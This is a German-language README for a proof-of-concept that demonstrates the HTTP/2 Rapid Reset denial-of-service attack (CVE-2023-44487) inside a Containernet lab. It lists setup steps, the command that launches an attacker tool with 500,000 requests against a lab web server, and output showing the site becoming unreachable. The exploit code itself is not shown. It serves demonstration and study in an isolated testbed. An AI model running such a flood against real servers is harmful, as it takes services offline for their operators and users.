
PoC für HTTP/2 Rapid Reset DDoS-Schwachstelle - CVE-2023-44487
Dieses Projekt demonstriert den HTTP/2 Rapid Reset Denial of Service (DoS)-Angriff unter Verwendung einer benutzerdefinierten Netzwerktopologie, die mit Containernet erstellt wurde. Der Angriff nutzt Schwachstellen im HTTP/2-Protokoll aus, um einen Zielserver zu überlasten und ihn unerreichbar zu machen.

Um die erforderlichen Pakete zu installieren, führen Sie die folgenden Befehle aus:
./install.sh
Um das Standardinstallationsverzeichnis zu ändern, können Sie die Variable INSTALL_DIR wie folgt anpassen:
INSTALL_DIR=/custom/path ./install.sh
Um die Infrastruktur zu starten, führen Sie die folgenden Befehle aus:
source ~/.containernet/containernet/venv/bin/activate
sudo -E env PATH=$PATH ./topo.py
Um den Angriff zu starten, führen Sie den folgenden Befehl im Angreifer-Container aus:
./attacker -url='https://modern.art:443/api' -requests=500000
Nach einigen Augenblicken, wenn Sie versuchen, die Website mit curl aufzurufen, wird sie unerreichbar.
root@attacker:/attacker# curl -k https://modern.art/
curl: (28) SSL connection timeout
Um die Infrastruktur zu stoppen, geben Sie einfach exit in dem Terminal ein, in dem topo.py ausgeführt wird.